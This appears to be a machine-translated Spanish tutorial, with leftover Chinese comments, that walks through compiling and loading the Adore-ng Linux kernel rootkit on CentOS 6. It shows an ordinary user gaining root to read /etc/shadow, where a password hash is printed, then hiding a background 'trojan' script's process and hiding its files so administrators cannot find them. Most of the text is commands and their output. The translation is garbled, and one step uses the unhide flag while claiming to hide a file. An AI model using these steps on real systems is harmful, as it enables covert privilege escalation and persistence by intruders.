Rootkit es una clase especial de software malicioso, su función es ocultar a sí mismo y los archivos especificados, los procesos y los enlaces web y otra información sobre el destino de la instalación, de manera más general se vea rootkits y troyanos, puertas traseras y otros programas maliciosos en conjunción .
Y hoy queremos aprender es simular como uno Rootkit malware: Adore-ng
medio ambiente: Centos 6
dos recursos utilizados aquí necesitar (descarga):
Instalación adore-ng
montado dependencia: kernel-devel-2,6
[root@Fp-01 ~]# yum -y install kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm
Loaded plugins: fastestmirror, security
Setting up Install Process
……
Installed:
kernel-devel.x86_64 0:2.6.32-754.27.1.el6
Complete!
Extraer instalador adore-ng
[root@Fp-01 ~]# unzip adore-ng-master.zip
[root@Fp-01 ~]# cd adore-ng-master
[root@Fp-01 adore-ng-master]# ll
-rw-r--r--. 1 root root 1143 Dec 30 2015 Makefile
# 已经有 makefile 文件,直接 make -j 4 编译即可
[root@Fp-01 adore-ng-master]# make -j 4
Módulo de carga
[root@Fp-01 adore-ng-master]# insmod adore-ng.ko
Ver Ayuda
[root@Fp-01 adore-ng-master]# ./ava
I print info (secret UID etc)
h hide file # 隐藏文件
u unhide file # 取消隐藏文件
r execute as root # 以root用户执行
R remove PID forever # 永久删除PID
U uninstall adore # 卸载 adore
i make PID invisible # 隐藏PID
v make PID visible # 取消隐藏PID
Los usuarios comunes a raíz mencionan la derecha
para agregar un usuario a probar el uso de una voluntad común
[root@Fp-01 ~]# useradd tom
[root@Fp-01 ~]# echo "123456" | passwd --stdin tom
Changing password for user tom.
passwd: all authentication tokens updated successfully.
Copiar Adorar-ng a la siguiente / tmp, debido a que el interruptor no puede entrar en el directorio personal del usuario root, cp -r: copia recursiva
[root@Fp-01 ~]# cp -r adore-ng-master /tmp/
Cambio de usuario, utilice el servidor de inicio de sesión de usuario tom
[root@Fp-01 ~]# ssh [email protected]
Are you sure you want to continue connecting (yes/no)? yes
tom@10.0.0.11's password:
[tom@Fp-01 ~]$ whoami
tom
Prueba, edite / etc / shadow
[tom@Fp-01 ~]$ vim /etc/shadow ……
"/etc/shadow" [Permission Denied]
Se puede ver, la autorización es denegada, esta vez, tenemos que mencionar el derecho a usar el ava
[tom@Fp-01 ~]$ /tmp/adore-ng-master/ava r vim /etc/shadow
56,501,501,56
Adore 1.56 installed. Good luck.
root:$6$tQrXvHNXMxM6eTuN$WJWqoN5bYKuy/PVxpVeWYLCCZ32OCur1rjHIvHOOytjLPPxRMV3jRB6IbENgA2ZBDWI0cwEOTBSwVnmmQlyT7.:18172:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
……
Ver en otro proceso terminal, la identidad del usuario es la raíz, el derecho a decir el éxito menciona explícitamente
[root@Fp-01 ~]# ps -ef |grep /etc/shadow
root 32703 30867 0 12:03 pts/3 00:00:00 vim /etc/shadow
root 32727 32667 0 12:03 pts/4 00:00:00 grep /etc/shadow
Oculta troyano proceso de
simulación de editar un programa de caballo de Troya
[tom@Fp-01 opt]$ /tmp/adore-ng-master/ava r mkdir script
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 opt]$ ll
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:09 script
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r vim a.sh
56,500,500,56
Adore 1.56 installed. Good luck.
#!/bin/bash
while :
do
echo `This is the virus` >> date.txt
sleep 1
done
Troyanos simple de salida analógica "Este es el virión", además de los permisos de ejecución, que se ejecuta en segundo plano
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r chmod +x a.sh
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r ./a.sh &
[1] 33987
[tom@Fp-01 script]$ 56,501,501,56
Adore 1.56 installed. Good luck.
Ir a ver el proceso por el ID de proceso
[tom@Fp-01 script]$ ps -ef |grep 33987
root 33987 30867 0 12:14 pts/3 00:00:00 /bin/bash ./a.sh
root 34137 33987 0 12:14 pts/3 00:00:00 sleep 1
tom 34139 30867 0 12:14 pts/3 00:00:00 grep 33987
Se puede ver, a continuación, los piratas informáticos de simulación de procesos ocultos
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava i 33987
56,501,501,56
Adore 1.56 installed. Good luck.
Made PID 33987 invisible.
el éxito oculta, esta vez, vamos a ver el proceso de descubrimiento, el proceso se ha ocultado
[tom@Fp-01 script]$ ps -ef |grep 33987
tom 34139 30867 0 12:14 pts/3 00:00:00 grep 33987
mover grandes: oculta los archivos
primero en ver el directorio / opt bajo la información del archivo
[tom@Fp-01 ~]$ ll /opt/
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:14 script
[tom@Fp-01 ~]$ ll /opt/script/
total 32
-rwxrwxr-x. 1 root root 77 Feb 13 12:13 a.sh
-rw-rw-r--. 1 root root 24737 Feb 13 12:24 date.txt
[tom@Fp-01 ~]$ tree /opt/
/opt/
└── script
├── a.sh
└── date.txt
Simulamos ocultar date.txt
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava u date.txt
56,500,500,56
Adore 1.56 installed. Good luck.
File 'date.txt' is now visible.
Esta vez a ver, no se puede encontrar un archivo se ha encontrado
[root@Fp-01 script]# tree /opt/
/opt/
└── script
└── a.sh
[root@Fp-01 ~]# ll /opt/script/
total 48
-rwxrwxr-x. 1 root root 77 Feb 13 12:13 a.sh
Escalada de privilegios a los privilegios de root -> Ocultar padres -> proceso padre inicia un proceso hijo (de virus) -> Ocultar carpetas
como un troyano se ha completado, el administrador del sistema es difícil de encontrar